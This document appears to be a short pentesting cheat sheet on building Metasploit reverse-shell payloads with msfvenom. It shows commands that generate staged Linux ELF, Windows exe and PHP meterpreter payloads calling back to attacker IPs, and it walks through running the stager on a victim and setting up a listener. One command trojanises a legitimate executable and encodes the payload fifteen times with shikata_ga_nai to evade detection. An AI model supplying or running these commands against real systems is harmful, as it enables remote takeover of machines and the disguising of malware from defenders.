To search for payloads:
└─$ msfvenom --list payloads | grep x64 | grep linux | grep reverse
linux/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker
linux/x64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/x64/pingback_reverse_tcp Connect back to attacker and report UUID (Linux x64)
linux/x64/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6
linux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
Pick the staged shell payload linux/x64/shell/reverse_tcp
:
$ msfvenom -p linux/x64/shell/reverse_tcp lhost=127.0.0.1 lport=5353 -f elf -o reverse5353
Pass this payload to the target machine.
Next, make the payload executable:
$ chmod +x reverse5353
$ ./reverse5353
On Kali, set up a listener with the same payload.
Finally, run the stager on victim's machine.
$ ./reverse5353
It should starts downloading the rest of the payload from Kali, which starts a reverse shell on Kali.
(optional) upgrade to a meterpreter with /post/multi/manage/shell_to_meterpreter
module
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.23.10 LPORT=4444 -a x86 -f exe > output.exe
$ msfvenom -p php/meterpreter_reverse_tcp lhost=<my-ip> lport=<port> -o shell.php
set up a listener with the same payload using exploit/multi/handler
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=5353 -f exe -e x86/shikata_ga_nai -i 15 -k -x service_bak.exe > service.exe
-x
: Specify what executable file (to use as a template) to inject the payload into-k
: Preserve the template behavior and inject the payload as a new thread-e x86/shikata_ga_nai -i 15
: Encoding the payload 15 times using shikata_ga_nai
To check encoding options:
msfvenom -l encoders